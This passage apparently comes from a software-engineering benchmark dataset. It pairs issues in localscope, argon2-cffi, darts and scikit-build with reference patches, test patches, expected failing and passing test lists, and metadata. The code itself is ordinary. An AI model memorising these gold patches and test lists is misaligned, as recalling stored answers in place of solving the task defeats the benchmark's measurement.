+ # Extract global variables from a function
+ # (https://docs.python.org/3/library/types.html#types.FunctionType) or keep the
+ # explicitly provided globals for code objects
+ # (https://docs.python.org/3/library/types.html#types.CodeType).
if isinstance(func, types.FunctionType):
code = func.__code__
_globals = {**func.__globals__, **inspect.getclosurevars(func).nonlocals}
else:
code = func
- _globals = _globals or {}
- # Add function arguments to the list of allowed exceptions
+ # Add function arguments to the list of allowed exceptions.
allowed.update(code.co_varnames[: code.co_argcount])
- opnames = {"LOAD_GLOBAL"}
+ # Construct set of forbidden operations. The first accesses global variables. The
+ # second accesses variables from the outer scope.
+ forbidden_opnames = {"LOAD_GLOBAL"}
if not allow_closure:
- opnames.add("LOAD_DEREF")
+ forbidden_opnames.add("LOAD_DEREF")
LOGGER.info("analysing instructions for %s...", func)
for instruction in dis.get_instructions(code):
LOGGER.info(instruction)
name = instruction.argval
- if instruction.opname in opnames:
- # Explicitly allowed
+ if instruction.opname in forbidden_opnames:
+ # Variable explicitly allowed by name or in `builtins`.
if name in allowed or hasattr(builtins, name):
continue
- # Complain if the variable is not available
+ # Complain if the variable is not available.
if name not in _globals:
- raise NameError(f"`{name}` is not in globals")
- # Get the value of the variable and check it against the predicate
+ raise LocalscopeException(
+ f"`{name}` is not in globals", code, instruction
+ )
+ # Check if variable is allowed by value.
value = _globals[name]
if not predicate(value):
- raise ValueError(f"`{name}` is not a permitted global")
+ raise LocalscopeException(
+ f"`{name}` is not a permitted global", code, instruction
+ )
elif instruction.opname == "STORE_DEREF":
+ # Store a new allowed variable which has been created in the scope of the
+ # function.
allowed.add(name)
+
# Deal with code objects recursively after adding the current arguments to the
# allowed exceptions
for const in code.co_consts:
if isinstance(const, types.CodeType):
- localscope(
+ _localscope(
const,
_globals=_globals,
allow_closure=True,
|
tillahoffmann/localscope
|
fe4334355ea6e7bd1af0a15509b1f7a65f9da3b0
|
diff --git a/tests/test_localscope.py b/tests/test_localscope.py
index 41bc69c..232a966 100644
--- a/tests/test_localscope.py
+++ b/tests/test_localscope.py
@@ -1,4 +1,4 @@
-from localscope import localscope
+from localscope import localscope, LocalscopeException
import uuid
import pytest
@@ -16,15 +16,24 @@ def test_vanilla_function():
def test_missing_global():
- with pytest.raises(NameError):
+ def func():
+ return never_declared # noqa: F821
- @localscope
- def func():
- return never_ever_declared # noqa: F821
+ with pytest.raises(LocalscopeException, match="`never_declared` is not in globals"):
+ localscope(func)
+
+ # IMPORTANT! This function can be executed, but localscope complains because the
+ # global variable is not defined at the time when the function is analysed. This
+ # could be improved, but, most likely, one shouldn't write functions that rely on
+ # future globals in the first place.
+ """
+ never_declared = 123
+ assert func() == 123
+ """
def test_forbidden_global():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@localscope
def return_forbidden_global():
@@ -57,7 +66,7 @@ def test_closure():
return return_forbidden_closure()
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_closure` is not a perm"):
wrapper()
@@ -76,7 +85,7 @@ def test_allow_any_closure():
def test_allow_custom_predicate():
decorator = localscope(predicate=lambda x: isinstance(x, int))
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@decorator
def return_forbidden_global():
@@ -90,7 +99,7 @@ def test_allow_custom_predicate():
def test_comprehension():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`integer_global` is not a perm"):
@localscope
def evaluate_mse(xs, ys): # missing argument integer_global
@@ -98,7 +107,7 @@ def test_comprehension():
def test_recursive():
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
@localscope
def wrapper():
@@ -108,6 +117,17 @@ def test_recursive():
return return_forbidden_global()
+def test_recursive_without_call():
+ # We even raise an exception if we don't call a function. That's necessary because
+ # we can't trace all possible execution paths without actually running the function.
+ with pytest.raises(LocalscopeException, match="`forbidden_global` is not a perm"):
+
+ @localscope
+ def wrapper():
+ def return_forbidden_global():
+ return forbidden_global
+
+
def test_recursive_local_closure():
@localscope
def wrapper():
@@ -134,7 +154,7 @@ def test_mfc():
x = 1
- with pytest.raises(ValueError):
+ with pytest.raises(LocalscopeException, match="`x` is not a permitted"):
@localscope.mfc
def breakit():
|
Add hints for where the offending variable is used...
... to make debugging easier.
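A rough sketch of the kind of hint being asked for (hypothetical helper; the real change may format things differently): pull the file, line, and enclosing name out of the code object and the offending instruction.

```python
import dis
import types

def format_location(code: types.CodeType, instruction: dis.Instruction) -> str:
    # Hypothetical helper: prefer the instruction's own line number and fall
    # back to the first line of the enclosing code object.
    lineno = instruction.starts_line or code.co_firstlineno
    return f'file "{code.co_filename}", line {lineno}, in {code.co_name}'
```

With something like this, the error could read `` `a` is not a permitted global (file "...", line 1, in print_a)`` instead of only naming the variable.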
|
0.0
|
fe4334355ea6e7bd1af0a15509b1f7a65f9da3b0
|
[
"[",
"[100%]",
"tests/test_localscope.py::test_vanilla_function",
"tests/test_localscope.py::test_missing_global",
"tests/test_localscope.py::test_forbidden_global",
"tests/test_localscope.py::test_builtin",
"tests/test_localscope.py::test_allowed",
"tests/test_localscope.py::test_closure",
"tests/test_localscope.py::test_allow_any_closure",
"tests/test_localscope.py::test_allow_custom_predicate",
"tests/test_localscope.py::test_comprehension",
"tests/test_localscope.py::test_recursive",
"tests/test_localscope.py::test_recursive_without_call",
"tests/test_localscope.py::test_recursive_local_closure",
"tests/test_localscope.py::test_mfc",
"tests/test_localscope.py::test_comprehension_with_argument",
"tests/test_localscope.py::test_comprehension_with_closure",
"tests/test_localscope.py::test_argument",
"tests/test_localscope.py::test_argument_with_closure",
"tests/test_localscope.py::test_local_deref"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-02-17 01:12:54+00:00
|
mit
| 5,912
|
|
hynek__argon2-cffi-174
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index e3fe7fb..46c0765 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -26,6 +26,12 @@ What explicitly *may* change over time are the default hashing parameters and th
## [Unreleased](https://github.com/hynek/argon2-cffi/compare/23.1.0...HEAD)
+### Changed
+
+- `argon2.PasswordHasher.check_needs_rehash()` now also accepts bytes like the rest of the API.
+ [#174](https://github.com/hynek/argon2-cffi/pull/174)
+
+
## [23.1.0](https://github.com/hynek/argon2-cffi/compare/21.3.0...23.1.0) - 2023-08-15
### Removed
diff --git a/src/argon2/_password_hasher.py b/src/argon2/_password_hasher.py
index 125149b..ef940b3 100644
--- a/src/argon2/_password_hasher.py
+++ b/src/argon2/_password_hasher.py
@@ -244,7 +244,7 @@ class PasswordHasher:
hash, _ensure_bytes(password, self.encoding), hash_type
)
- def check_needs_rehash(self, hash: str) -> bool:
+ def check_needs_rehash(self, hash: str | bytes) -> bool:
"""
Check whether *hash* was created using the instance's parameters.
@@ -264,5 +264,9 @@ class PasswordHasher:
Whether *hash* was created using the instance's parameters.
.. versionadded:: 18.2.0
+ .. versionchanged:: 24.1.0 Accepts bytes for *hash*.
"""
+ if isinstance(hash, bytes):
+ hash = hash.decode("ascii")
+
return self._parameters != extract_parameters(hash)
|
hynek/argon2-cffi
|
abd0cf90d665f0b709ecccefe4b6187d14d60ffa
|
diff --git a/tests/test_password_hasher.py b/tests/test_password_hasher.py
index d6fa626..17f9410 100644
--- a/tests/test_password_hasher.py
+++ b/tests/test_password_hasher.py
@@ -109,22 +109,32 @@ class TestPasswordHasher:
with pytest.raises(InvalidHash):
PasswordHasher().verify("tiger", "does not matter")
- def test_check_needs_rehash_no(self):
+ @pytest.mark.parametrize("use_bytes", [True, False])
+ def test_check_needs_rehash_no(self, use_bytes):
"""
Return False if the hash has the correct parameters.
"""
ph = PasswordHasher(1, 8, 1, 16, 16)
- assert not ph.check_needs_rehash(ph.hash("foo"))
+ hash = ph.hash("foo")
+ if use_bytes:
+ hash = hash.encode()
- def test_check_needs_rehash_yes(self):
+ assert not ph.check_needs_rehash(hash)
+
+ @pytest.mark.parametrize("use_bytes", [True, False])
+ def test_check_needs_rehash_yes(self, use_bytes):
"""
Return True if any of the parameters changes.
"""
ph = PasswordHasher(1, 8, 1, 16, 16)
ph_old = PasswordHasher(1, 8, 1, 8, 8)
- assert ph.check_needs_rehash(ph_old.hash("foo"))
+ hash = ph_old.hash("foo")
+ if use_bytes:
+ hash = hash.encode()
+
+ assert ph.check_needs_rehash(hash)
def test_type_is_configurable(self):
"""
|
Make PasswordHasher.check_needs_rehash() accept bytes hash
`PasswordHasher.check_needs_rehash()` should also accept bytes hashes to be consistent with the rest of the API.
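A short sketch of the intended usage (the bytes call is hypothetical until the change lands; everything else is the existing `PasswordHasher` API):

```python
from argon2 import PasswordHasher

ph = PasswordHasher()
hash_str = ph.hash("s3kr3t")           # str, e.g. "$argon2id$v=19$..."
hash_bytes = hash_str.encode("ascii")  # the same hash, as bytes

# hash()/verify() already work with bytes; the request is that
# check_needs_rehash() accepts both forms and gives the same answer:
assert ph.check_needs_rehash(hash_str) is False
assert ph.check_needs_rehash(hash_bytes) is False  # fails before the change
```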
|
0.0
|
abd0cf90d665f0b709ecccefe4b6187d14d60ffa
|
[
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_no[True]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_yes[True]"
] |
[
"tests/test_password_hasher.py::TestEnsureBytes::test_is_bytes",
"tests/test_password_hasher.py::TestEnsureBytes::test_is_str",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_custom_salt",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_agility[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_agility[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash_verify[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash_verify[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_invalid_hash_error",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_invalid_hash",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_no[False]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_yes[False]",
"tests/test_password_hasher.py::TestPasswordHasher::test_type_is_configurable"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-04-16 06:36:03+00:00
|
mit
| 2,768
|
|
unit8co__darts-1435
|
diff --git a/darts/timeseries.py b/darts/timeseries.py
index fc757f58..b629aa4f 100644
--- a/darts/timeseries.py
+++ b/darts/timeseries.py
@@ -2604,10 +2604,6 @@ class TimeSeries:
attrs=self._xa.attrs,
)
- # new_xa = xr.concat(objs=[self._xa, other_xa], dim=str(self._time_dim))
- if not self._has_datetime_index:
- new_xa = new_xa.reset_index(dims_or_levels=new_xa.dims[0])
-
return self.__class__.from_xarray(
new_xa, fill_missing_dates=True, freq=self._freq_str
)
@@ -2626,7 +2622,6 @@ class TimeSeries:
TimeSeries
A new TimeSeries with the new values appended
"""
-
if self._has_datetime_index:
idx = pd.DatetimeIndex(
[self.end_time() + i * self._freq for i in range(1, len(values) + 1)],
@@ -2634,9 +2629,10 @@ class TimeSeries:
)
else:
idx = pd.RangeIndex(
- len(self), len(self) + self.freq * len(values), step=self.freq
+ start=self.end_time() + self._freq,
+ stop=self.end_time() + (len(values) + 1) * self._freq,
+ step=self._freq,
)
-
return self.append(
self.__class__.from_times_and_values(
values=values,
|
unit8co/darts
|
9a40ca61ad34a7087bcfb27b01f0ea845a9fa4ae
|
diff --git a/darts/tests/test_timeseries.py b/darts/tests/test_timeseries.py
index c4414a13..61688bd2 100644
--- a/darts/tests/test_timeseries.py
+++ b/darts/tests/test_timeseries.py
@@ -621,15 +621,53 @@ class TimeSeriesTestCase(DartsBaseTestClass):
def test_append(self):
TimeSeriesTestCase.helper_test_append(self, self.series1)
+ # Check `append` deals with `RangeIndex` series correctly:
+ series_1 = linear_timeseries(start=1, length=5, freq=2)
+ series_2 = linear_timeseries(start=11, length=2, freq=2)
+ appended = series_1.append(series_2)
+ expected_vals = np.concatenate(
+ [series_1.all_values(), series_2.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(appended.all_values(), expected_vals))
+ self.assertTrue(appended.time_index.equals(expected_idx))
def test_append_values(self):
TimeSeriesTestCase.helper_test_append_values(self, self.series1)
+ # Check `append_values` deals with `RangeIndex` series correctly:
+ series = linear_timeseries(start=1, length=5, freq=2)
+ appended = series.append_values(np.ones((2, 1, 1)))
+ expected_vals = np.concatenate(
+ [series.all_values(), np.ones((2, 1, 1))], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(appended.all_values(), expected_vals))
+ self.assertTrue(appended.time_index.equals(expected_idx))
def test_prepend(self):
TimeSeriesTestCase.helper_test_prepend(self, self.series1)
+ # Check `prepend` deals with `RangeIndex` series correctly:
+ series_1 = linear_timeseries(start=1, length=5, freq=2)
+ series_2 = linear_timeseries(start=11, length=2, freq=2)
+ prepended = series_2.prepend(series_1)
+ expected_vals = np.concatenate(
+ [series_1.all_values(), series_2.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(prepended.all_values(), expected_vals))
+ self.assertTrue(prepended.time_index.equals(expected_idx))
def test_prepend_values(self):
TimeSeriesTestCase.helper_test_prepend_values(self, self.series1)
+ # Check `prepend_values` deals with `RangeIndex` series correctly:
+ series = linear_timeseries(start=1, length=5, freq=2)
+ prepended = series.prepend_values(np.ones((2, 1, 1)))
+ expected_vals = np.concatenate(
+ [np.ones((2, 1, 1)), series.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=-3, stop=11, step=2)
+ self.assertTrue(np.allclose(prepended.all_values(), expected_vals))
+ self.assertTrue(prepended.time_index.equals(expected_idx))
def test_with_values(self):
vals = np.random.rand(5, 10, 3)
|
[BUG] `append_values` incorrectly extends `time_index` of `pd.RangeIndex`-typed `TimeSeries`
**Describe the bug**
When `append_values` is used to add new values to a `pd.RangeIndex`-typed `TimeSeries` , the `time_index` of the entire series is 'reset' so that each value is labeled with its index position. This is particularly unexpected if the `TimeSeries` in question does not have a frequency of `1` and/or does not start with a `time_index` of `0`.
**To Reproduce**
Consider the following example:
```python
from darts.utils.timeseries_generation import linear_timeseries
import numpy as np
series = linear_timeseries(start=1, length=5, freq=2)
print('Before `append_values`:')
print(list(series.time_index))
new_values = np.ones((1,))
print('After `append_values`:')
print(list(series.append_values(new_values).time_index))
```
This yields:
```
Before `append_values`:
[1, 3, 5, 7, 9]
After `append_values`:
[0, 1, 2, 3, 4, 5]
```
Notice how the `time_index` now starts at `0` instead of `1` **and** has a frequency of `1` instead of `2`.
**Expected behavior**
Instead of resetting the `time_index` of `pd.RangeIndex`-typed `TimeSeries`, `append_values` should 'extend' the `time_index`. More explicitly, for the previous example, one should expect the output:
```
Before `append_values`:
[1, 3, 5, 7, 9]
After `append_values`:
[1, 3, 5, 7, 9, 11]
```
Indeed, this is the [behaviour that's advertised by `append_values`' docstring](https://unit8co.github.io/darts/generated_api/darts.timeseries.html#darts.timeseries.TimeSeries.append_values) and, additionally, is how it behaves when dealing with `pd.DatetimeIndex`-typed `TimeSeries`. To see this, consider the following example:
```python
from darts.utils.timeseries_generation import linear_timeseries
import numpy as np
import pandas as pd
series = linear_timeseries(start=pd.Timestamp('1/1/2000'), length=2, freq='2d')
print('Before `append_values`:')
print(list(series.time_index))
new_values = np.ones((1,))
print('After `append_values`:')
print(list(series.append_values(new_values).time_index))
```
This prints:
```
Before `append_values`:
[Timestamp('2000-01-01 00:00:00', freq='2D'), Timestamp('2000-01-03 00:00:00', freq='2D')]
After `append_values`:
[Timestamp('2000-01-01 00:00:00', freq='2D'), Timestamp('2000-01-03 00:00:00', freq='2D'), Timestamp('2000-01-05 00:00:00', freq='2D')]
```
Notice how `append_values` has simply added the date `2000-01-05` to the `time_index` of `series`.
In cases where the user really wants to 'reset' the `time_index` of a `TimeSeries` after appending values, this should probably be achieved by implementing a separate `TimeSeries.reset_index()` method.
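For reference, the index arithmetic that the expected behaviour implies can be expressed in plain pandas (a hypothetical helper, not darts API):

```python
import pandas as pd

def extend_range_index(idx: pd.RangeIndex, n: int) -> pd.RangeIndex:
    # Extend a RangeIndex by `n` steps while keeping its start and step.
    return pd.RangeIndex(start=idx.start, stop=idx.stop + n * idx.step, step=idx.step)

idx = pd.RangeIndex(start=1, stop=11, step=2)  # [1, 3, 5, 7, 9]
print(list(extend_range_index(idx, 1)))        # [1, 3, 5, 7, 9, 11]
```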
**System (please complete the following information):**
- Python version: 3.10.6
- darts version: 0.22.0
**Additional context**
N/A
|
0.0
|
9a40ca61ad34a7087bcfb27b01f0ea845a9fa4ae
|
[
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_append",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_append_values",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_prepend",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_prepend_values"
] |
[
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_alt_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_column_names",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_dates",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_diff",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_drop",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_eq",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_fill_missing_dates",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_fillna_value",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_from_csv",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_gaps",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_getitem",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_index_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_integer_indexing",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_intersect",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_longest_contiguous_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map_with_timestamp",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map_wrong_fn",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_ops",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_quantiles",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_quantiles_df",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_rescale",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_shift",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_short_series_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_split",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_deterministic",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_probabilistic_ts",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_stochastic",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_univariate_component",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_with_columns_renamed",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_with_values",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_with_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_with_force_uneven_series",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_sample_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_no_force_2_day_freq",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_same_time_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_same_time_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_timeseries_method",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_concat",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_creation_with_hierarchy_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_hierarchy_processing",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_ops",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_with_hierarchy_rainy_day",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_with_hierarchy_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_numeric_time_index",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_numeric_time_index",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_sunny_day_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_sunny_day_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_fail_with_bad_integer_time_col",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_from_dataframe_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_datetime",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_datetime_strings",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_garbage",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_integers",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_rangeindex",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_string_integers",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_with_tz",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_kurtosis",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_max",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_mean",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_median",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_min",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_quantile",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_skew",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_std",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_sum",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_var"
] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-18 03:42:10+00:00
|
apache-2.0
| 6,165
|
|
scikit-build__scikit-build-105
|
diff --git a/skbuild/cmaker.py b/skbuild/cmaker.py
index 9030c1e..2c7d7f5 100644
--- a/skbuild/cmaker.py
+++ b/skbuild/cmaker.py
@@ -9,6 +9,8 @@ import shlex
import sys
import sysconfig
+from subprocess import CalledProcessError
+
from .platform_specifics import get_platform
from .exceptions import SKBuildError
@@ -62,10 +64,11 @@ def _touch_init(folder):
class CMaker(object):
def __init__(self, **defines):
- if platform.system() != 'Windows':
- rtn = subprocess.call(['which', 'cmake'])
- if rtn != 0:
- sys.exit('CMake is not installed, aborting build.')
+ # verify that CMake is installed
+ try:
+ subprocess.check_call(['cmake', '--version'])
+ except (OSError, CalledProcessError):
+ raise SKBuildError('CMake is not installed, aborting build.')
self.platform = get_platform()
@@ -93,8 +96,9 @@ class CMaker(object):
generator_id = self.platform.get_best_generator(generator_id)
if generator_id is None:
- sys.exit("Could not get working generator for your system."
- " Aborting build.")
+ raise SKBuildError(
+ "Could not get working generator for your system."
+ " Aborting build.")
if not os.path.exists(CMAKE_BUILD_DIR):
os.makedirs(CMAKE_BUILD_DIR)
@@ -137,11 +141,20 @@ class CMaker(object):
# changes dir to cmake_build and calls cmake's configure step
# to generate makefile
- rtn = subprocess.check_call(cmd, cwd=CMAKE_BUILD_DIR)
+ rtn = subprocess.call(cmd, cwd=CMAKE_BUILD_DIR)
if rtn != 0:
- raise RuntimeError("Could not successfully configure "
- "your project. Please see CMake's "
- "output for more information.")
+ raise SKBuildError(
+ "An error occurred while configuring with CMake.\n"
+ " Command:\n"
+ " {}\n"
+ " Source directory:\n"
+ " {}\n"
+ " Working directory:\n"
+ " {}\n"
+ "Please see CMake's output for more information.".format(
+ self._formatArgsForDisplay(cmd),
+ os.path.abspath(cwd),
+ os.path.abspath(CMAKE_BUILD_DIR)))
CMaker.check_for_bad_installs()
@@ -335,7 +348,6 @@ class CMaker(object):
if bad_installs:
raise SKBuildError("\n".join((
- "",
" CMake-installed files must be within the project root.",
" Project Root:",
" " + install_dir,
@@ -349,7 +361,7 @@ class CMaker(object):
"""
clargs, config = pop_arg('--config', clargs, config)
if not os.path.exists(CMAKE_BUILD_DIR):
- raise RuntimeError(("CMake build folder ({}) does not exist. "
+ raise SKBuildError(("CMake build folder ({}) does not exist. "
"Did you forget to run configure before "
"make?").format(CMAKE_BUILD_DIR))
@@ -361,8 +373,20 @@ class CMaker(object):
shlex.split(os.environ.get("SKBUILD_BUILD_OPTIONS", "")))
)
- rtn = subprocess.check_call(cmd, cwd=CMAKE_BUILD_DIR)
- return rtn
+ rtn = subprocess.call(cmd, cwd=CMAKE_BUILD_DIR)
+ if rtn != 0:
+ raise SKBuildError(
+ "An error occurred while building with CMake.\n"
+ " Command:\n"
+ " {}\n"
+ " Source directory:\n"
+ " {}\n"
+ " Working directory:\n"
+ " {}\n"
+ "Please see CMake's output for more information.".format(
+ self._formatArgsForDisplay(cmd),
+ os.path.abspath(source_dir),
+ os.path.abspath(CMAKE_BUILD_DIR)))
def install(self):
"""Returns a list of tuples of (install location, file list) to install
@@ -377,3 +401,14 @@ class CMaker(object):
return [_remove_cwd_prefix(path) for path in manifest]
return []
+
+ @staticmethod
+ def _formatArgsForDisplay(args):
+ """Format a list of arguments appropriately for display. When formatting
+ a command and its arguments, the user should be able to execute the
+ command by copying and pasting the output directly into a shell.
+
+ Currently, the only formatting is naively surrounding each argument with
+ quotation marks.
+ """
+ return ' '.join("\"{}\"".format(arg) for arg in args)
diff --git a/skbuild/exceptions.py b/skbuild/exceptions.py
index 4a0e074..2b8f8b1 100644
--- a/skbuild/exceptions.py
+++ b/skbuild/exceptions.py
@@ -1,3 +1,6 @@
-class SKBuildError(Exception):
+class SKBuildError(RuntimeError):
+ """Exception raised when an error occurs while configuring or building a
+ project.
+ """
pass
diff --git a/skbuild/setuptools_wrap.py b/skbuild/setuptools_wrap.py
index 0fbd86f..54efdb3 100644
--- a/skbuild/setuptools_wrap.py
+++ b/skbuild/setuptools_wrap.py
@@ -131,12 +131,56 @@ def setup(*args, **kw):
reverse=True
))
- cmkr = cmaker.CMaker()
- cmkr.configure(cmake_args)
- cmkr.make(make_args)
+ try:
+ cmkr = cmaker.CMaker()
+ cmkr.configure(cmake_args)
+ cmkr.make(make_args)
+ except SKBuildError as e:
+ import traceback
+ print("Traceback (most recent call last):")
+ traceback.print_tb(sys.exc_info()[2])
+ print()
+ sys.exit(e)
+
+ _classify_files(cmkr.install(), package_data, package_prefixes, py_modules,
+ scripts, new_scripts, data_files)
+
+ kw['package_data'] = package_data
+ kw['package_dir'] = {
+ package: os.path.join(cmaker.CMAKE_INSTALL_DIR, prefix)
+ for prefix, package in package_prefixes
+ }
+
+ kw['py_modules'] = py_modules
+
+ kw['scripts'] = [
+ os.path.join(cmaker.CMAKE_INSTALL_DIR, script) if mask else script
+ for script, mask in new_scripts.items()
+ ]
+
+ kw['data_files'] = [
+ (parent_dir, list(file_set))
